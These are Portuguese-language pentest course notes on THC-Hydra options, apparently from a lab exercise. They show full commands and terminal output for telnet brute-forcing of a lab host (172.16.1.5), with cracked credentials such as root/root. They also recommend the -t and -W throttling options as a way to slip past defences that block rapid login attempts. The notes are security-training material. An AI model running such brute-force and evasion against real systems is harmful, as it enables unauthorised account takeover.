Dicas Extras

- + Aqui serão apresentadas outras funcionalidades do hydra
- + Se dermos um man hydra, vamos ver as outras opções de uso dele, as quais destacamos
- $-s \rightarrow$ para definir uma porta [a exemplo do caso de logarmos em um serviço que não está rodando na sua porta padrão]
- -t → tasks [qtd de tarefas que ele executa em paralelo, o default é 16]
- -W \rightarrow define a qtd de tempo que ele demora entre cada execução [bom para dar bypass em mecanismos de defesa que bloqueam várias requisições em curtos períodos de tempo
- + Exemplo de execução:
- → Modo rápido:

hydra -v -L users.txt -P senhas.txt 172.16.1.5 telnet

```
root@pentesting:/home/desec/Desktop# hydra -v -L users.txt -P senhas.txt 172.16.1.5 telnet
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-05 00:36:45
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking telnet://172.16.1.5:23/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[23][telnet] host: 172.16.1.5 login: root password: root
[23][telnet] host: 172.16.1.5 login: ricardo password: admin
[STATUS] attack finished for 172.16.1.5 (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-05 00:36:55
```

→ Modo mais lento:

```
hydra -v -L users.txt -P senhas.txt 172.16.1.5 telnet -t 1 -W 5
```

→ aqui ele só executa uma task por vez e teste a cada 5 segundos

```
root@pentesting:/home/desec/Desktop# hydra -v -L users.txt -P senhas.txt 172.16.1.5 telnet -t 1 -W 5
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-05 00:37:08
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 1 task per 1 server, overall 1 task, 25 login tries (l:5/p:5), ~25 tries per task
[DATA] attacking telnet://172.16.1.5:23/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
```